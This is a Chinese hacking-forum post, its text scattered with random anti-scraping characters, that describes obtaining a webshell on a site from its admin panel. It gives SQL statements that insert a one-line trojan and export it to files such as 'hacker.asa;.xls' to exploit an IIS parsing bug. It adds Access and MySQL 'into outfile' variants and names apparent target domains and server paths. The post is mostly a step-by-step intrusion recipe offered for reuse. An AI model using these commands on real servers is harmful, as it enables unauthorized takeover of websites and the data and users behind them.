好不容易进了后台,发现啥上传啊。备份啊多木有。: t; k! H6 G7 G2 B2 m/ H
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
. t8 n( Z( ]; t8 F }文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
1 \7 Y+ A5 L% S3 _" `! b然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:; h5 \9 b) T9 ]
1.create table cmd (a varchar(50))
( r# ?2 c/ m/ r X/ h t7 e5 o3 v2.insert into cmd (a) values (‘‘)
- P4 s4 i& D/ r0 u" J3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd: Q0 ^: v( N4 Z7 y$ z' O; ]) t4 ^- {
(把表cmd的内容导出为物理路径的一个EXCEL文件)6 p% ^: t; `- F# y
4.drop table cmd5 N3 I( \4 {' V* T4 L
利用IIS的BUG成功拿到了WEBSHELL。
' ^* o6 J- ~, B0 ?4 f6 D! q
7 ]9 [% `* n8 Y) V: m; ^) u直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话% _+ k$ j/ \* `
' K1 c6 Y" N8 v6 C SQL语句意思解释:
# @$ Y8 o' u, r+ ^0 W# C 第一句+ J: U3 R. l$ d- q& G
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
$ e4 U+ v$ b! p* h j& ?% b# r; C( A; F- A. ^; J
第二句* q' |; J7 }. U! J
在表cmd的a字段插入一句话木马! p3 T% {$ O7 U; Y( F# a
第三句
' V& k1 e" m- h( a( a1 t 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件9 a% y3 ?+ U7 z2 k8 H' C
& H8 r, G$ E4 X. X
第四句
, y6 M1 l( R9 }. o 删除建立的cmd表$ L' I' }$ i( U1 k
* Y8 s3 J8 U' \6 D1 P
以下内容为测试:
5 ]- p/ B9 s! `- g+ j Access利用后台SQL执行命令功能导出WebShell:
1 S6 Q, G* v- N. q) v 这个更简单:
. L5 y% @$ u+ @0 {8 V" ?4 z2 a [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]6 X- e+ x& P/ S: S6 Q9 a# }* u/ R
或者
8 g4 J2 T3 q. ^+ T, } [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]$ r, L" A5 ]: I1 @: ]( q( Y/ T
1 M: M' G7 m$ L: n2 U3 S 后台有执行SQL语句功能(vote为已知表段)
( S" \ \0 [2 [ 希望对大家有所帮助拿shell的又一个思路: ]( O! b; J" \' K; T: b
|